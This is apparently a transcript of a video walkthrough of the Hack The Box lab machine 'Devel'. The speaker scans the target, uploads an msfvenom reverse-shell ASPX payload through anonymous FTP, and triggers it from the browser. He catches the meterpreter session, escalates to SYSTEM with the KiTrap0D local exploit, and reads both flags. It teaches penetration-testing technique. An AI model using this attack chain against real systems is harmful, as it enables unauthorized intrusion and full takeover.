Hello and welcome to the video. Today we're going to be working on a machine from Hackthebox called Devel. Now the nice thing about this machine is we're going to learn two main things from it. The first is we'll learn the dangers of anonymous FTP, and the second is we're going to learn how to create a malicious payload based off of information that we have, right? So just to start, we have Devel here, right? You can see that I have this box right there. It's on. You could tell because I have this IP address. Right, we could see that it's green. It says it's online in the top right corner. And then also you could see I'm connected via my VPN. For those who don't know how to connect the VPN, feel free to refer to my previous videos where I walk through how to set up your Hack the Box VPN. But for those of you who are here today, we're just going to be hacking Devel. So first things first, let's try to ping the box, right? So I'm going to ping 10.10.10.5 and hit enter. And you could tell that since I have 64 bytes back from that IP address, that I am connected, I'm able to talk to this machine. Now, let's do an IP address that I'm not connected to, right? You could see in this circumstance, right, with 10.10.10.6, that we get destination host unreachable, right? So that's just so you could see the difference between a ping that works and a ping that does not work. Now, as always, if I'm able to ping an IP address, that means my next step is probably to try to Nmap it, to see if I can Nmap scan it. And as always, I'm going to do Nmap dash SC so that we run some vulnerability scripts on the IP address, dash SV so that we can get a little bit more information on the version number of the services on this machine. And then I'm just going to put in my victim IP address and hit enter. The scan is going to take a couple seconds, probably not too long because this box is not too extensive, right? There aren't too many ports that are firing here. But once again, we have the Nmap command. This is my active recon tool. We have two option flags here. The first being it's running scripts to see if there's any vulnerabilities on this machine. The second running version numbers. And then last but not least, we have the IP address that we're scanning. Now, as you can see, I said before, this is a pretty simple box. We really only have two main ports open. We have port 21, which is FTP, and we have port 80. Now, if you ever see that port 80 is open or port 443, that means that you can view it on your browser, right? So the first thing I like to do whenever I see 80 or 443 open, I like to just type the IP address into my browser, and here's our machine. This is the web portal associated with the machine that we're attacking. Now, the difference would be, let's say instead of port 80 was open, port 443 was open. That means instead of using HTTP, we'd be using HTTPS. In this case, that is not true, right? We're using port 80, so if I have the S in there, it actually throws off our search, right? So you got to make sure the S is out of there. Right off the bat, we see a little bit of information. We see IIS7, and if I just go to the web and I type in IIS7 and hit enter, right, you'll see right away that this is probably a Windows machine. Right, I see that we have IIS7, and the machine I'm attacking is probably either Windows Vista or Windows 7. And within a matter of seconds, honestly, I already have some pretty important information about this machine. Now, since I'm pen testing this machine in 2023, which is way off from Windows 7 and Windows Vista, right? Those are very old operating systems. As an attacker, my eyes are already going wide. Right, I'm already thinking of all the different vulnerability and exploits that are probably existing on this machine. Now, from just an Nmap scan, we have already established that this machine's probably vulnerable to quite a bit of things. The next thing I'm going to do, right, so we just figured out from this port, right, a little bit more about our machine. We could also see from what we ran, we have this specific version of HTTP. We see the operating system's probably Windows, right, so that's good information as well. But we also see that there's another port open. So this isn't the only information we can get. Right here, we have port 21 open, which is FTP. And for those who do not know, FTP stands for File Transfer Protocol. What does File Transfer Protocol mean? Well, it means almost exactly what the name is. It's a service that allows you to transfer a file from one place to another. But the interesting thing about this machine and its FTP protocol is that it allows something called anonymous login. I can tell from right here, we have anonymous FTP login allowed. And all that means is if I clear my screen out, I'm going to do Control L. If I type in FTP in the IP address of our victim machine and hit enter, I can use the name anonymous. I can hit enter and leave a blank password, and I will now be able to pull and put files onto the server. Now, why is that bad from a security perspective? Well, if I could put files on the server, that means I could also put malicious files on the server. So I'm going to exit FTP, and I'm actually going to create a malicious file for us to put on here. So I'm going to use something called MSF Venom. You all maybe have seen it before, but it is a tool that is basically a branch of the Metasploit console framework. And to use it, all I have to do is type in MSF Venom. And now we have to add a couple of option flags and a couple of instructions to create a malicious payload that we'll be using to exploit this machine. So first is the command name, MSF Venom. Next, I'm going to do -P for payload, and I'm going to specify the type of payload I want to use. Now, as we saw from our reconnaissance before, we're going to be using a Windows machine. So I'm going to do Windows. I'm going to make this some interpreter shell. This is just going to be how we interact with the other machine once we set up that shell. And then last but not least, I'm going to do reverse_TCP. Now, there are two options here, or two main options. You could either get a reverse connection or you could get a bind connection. The way it works is a bind connection is the attacking machine will try to connect to the victim machine. That's tricky to do because firewalls are typically very screwedness on the type of connections that they allow into a victim machine. A reverse shell, on the other hand, gets the victim machine to connect to us. And why is that easier? Well, think of the firewall, right? While firewall might be more critical of connections coming into a victim machine, it's much less critical of connections going out of that machine. Take your own computer, for example. Now, you need to be able to search the web, and you need to be able to send emails, you need to be able to send all these other things, right? And in that way, your firewall has to allow those things to happen. Now, when it comes to the things that can connect to your computer, that's different. Your firewall is going to be probably much more screwedness of that traffic, right? So by using a reverse shell, we're going to increase our chances of successfully being able to create a connection. The next thing I'm going to do lhost. This is going to be our listening host. This is the machine I'm currently using as my attacking machine. And it's going to be 10.10.14.3. A common mistake people make when they're doing this in hackthebox is they'll use an lhost that isn't their hackthebox lhost, right? So I'll actually show you real quick. I'm going to clear out my screen here and do IP space A. This right here, this ton0, this is my hackthebox IP address. A lot of times people will either use, their local IP or one other IP that they have. You just have to make sure that you're using the actual IP address that's connected to the hackthebox boxes. And typically those start with 10.10 whatever. So now going back to it, I'm going to do L port. This is the port we will be listening on. I'm going to let's do 9001, right, because it's over 9,000. Then I'm going to do -F for format. And if you looked up a little bit more about the version that we were using, that IIS website here, you would find out that this actually uses ASPX as its format. So I'm just going to do ASPX. And I'm going to output this to, let's call it exploit.aspx, and hit enter. Now this is going to take a second. It's basically forging your custom malicious payload right now. I'm just going to type in ls, and we can see we have our exploit right here. Now what I'm going to do is I'm going to put this exploit onto our server. So I'm going to FTP in to that victim machine. I'm going to do our anonymous login by typing in the username anonymous and hitting enter with a blank password. And then I'm going to type in the command put exploit.aspx and hit enter. This has just successfully transferred our malicious payload from my attacking machine to my victim machine. Now the question is, how do we get the victim machine to activate this malicious payload? Well, we could do it by just navigating it in the browser. We can actually just type in a / and then exploit.aspx, and when I hit enter, it'll actually execute our malicious payload. Before I execute this, I actually have to prime my attacking machine to be able to accept the connection, right? What we're doing right now is by executing this payload, I'm going to force the victim machine to connect to me. But in order for me to actually successfully field that connection, we need to do a little bit of setup work. So all I'm going to do now, I'm going to exit out of FTP. I'm going to do Control L to clear my screen. And I'm going to do MSF console. And we're going to boot up the Metasploit console. So what I'm going to do now, I'm going to type in use exploit multi handler and hit enter. And I'm going to set our payload. So I'm going to do set payload to Windows /meterpreter /reverse TCP. Now you might be wondering, how did I know to set our payload to Windows meterpreter reverse TCP? Well, the answer is this is going to match whatever we used for our MSF Venom, right? We could see Windows meterpreter reverse TCP. So I'm just going to match my payload for this, right? So just to summarize what we've done, I did use exploit multi-handler. This is going to be us setting up our, we call it a listener device. I set the payload to Windows meterpreter reverse TCP because that matches the malicious payload we put on our victim machine. I'm going to hit enter. Now I just have to set the L host, which is once again the listening host. That's going to be my attacking machine. And then the L port, which once again, this is going to match. Both these things will match what we just did in MSF Venom, right? L host we have here. L port is 9001. So 9001. And then last but not least, I'm going to hit run. And we now have our listener open. So now what I've just done is our victim machine is listening. It's waiting for a connection from our victim machine. All we have to do is activate that connection from the victim machine, and we're good to go. So I'm going to go back to our browser. As I said before, all we have to do to activate our payload is we're going to add to the end of the IP address a / and our payload name and hit enter. And if I go back to my Kali machine, you'll see it should say sending stage to 10.10.10.5, and we should get our first shell open. Now to learn more about the system, right, we've just broken in. I'm going to type in sysinfo and hit enter. And we'll learn that this machine is called Devel. It's a Windows 7 operating system, x86 architecture, and we can see there are 2 users logged onto the machine. I can also do get UID, and we could see that we're a low-level user, right? So we're not going to have many permissions with this. What we want to do now is we want to escalate our privileges. We just broke into the machine, but it's with a low privilege user. We can't do too much with this individual. So what I'm going to do now is I'm going to use something called the local exploit suggester. And to do that, all I'm going to do is type in run post multi recon local, and then if you hit tab, it'll finish it out for you, but _ exploit _ suggester and hit enter. So this is going to run for a little bit. It's basically going to take the session we just opened up, and it's going to try to figure out what exploits are available on this machine for privilege escalation. Now that our scan's done, if I scroll up to the top, what you typically would have to do is you'd have to go through these and you'd have to see which ones work and which ones don't, right? This suggester is just that. It'll suggest things, but it doesn't know for sure. Now, I'm going to save you all the busy work, and I'm going to tell you that the one we'll be using today is this. So I'm just going to copy it. I'm going to scroll down to the bottom. I'm going to type in background, or I'll just do Control-Z to background this and hit yes. And now all I'm going to do is type in the word use, and I'm going to paste the exploit we just copied, which is our exploit Windows local MS10 Kitrapod exploit, and hit enter. All I need to do now, similar to what we had to do before, is I'm going to do show options, and I'm going to have to set the session, the L host, and the L port. So I'm going to do set session to 1 because that's the, if we scroll back up here, that's the session we just backgrounded. That's the open shell we have with that low-level user is on session 1. I'm going to set L host to 10.10.14.3. Once again, your IP address will be different. This is the hackthebox IP address that you're using. And I'm going to set my L port to 9001 because it has to match what we've been using this whole time. Now when I type in run and hit enter, this is going to attempt to take our low-level user and escalate our privileges to an administrator on this machine. Now we see it's completed. And now when I type in get UID, instead of a low-level user, we now have NT authority. And for anyone who doesn't know, that's basically administrator for a Windows machine. So to finish this box off, all I have to do is type in CD/users. I'm going to ls. And you can see I have two directories. I have administrator and Babis. These are the two different users. I'm going to first go to Babis, CD Babis. And now we just have to find where the user.txt is, right? Typically, it's going to be on the desktop for hackthebox, but obviously in a real-world scenario, you might have to do a bit more searching to find the information you're looking for. But I CD to desktop. I did ls to list one more time, and you can see we have the user.txt right here. So this is our first flag. Now to get our next flag, all I have to do is just CD out of this. I'm going to do CD ... I'll do ls to see where I am. And I'm going to CD into the administrator folder. ls, CD to desktop one more time because that's typically where the text files with our flags are. ls one more time. And I'm going to cat root.txt. Now we found both flags and we're done with the box. Thank you all for joining the video. I hope you enjoyed, and I'll see you all in the next video.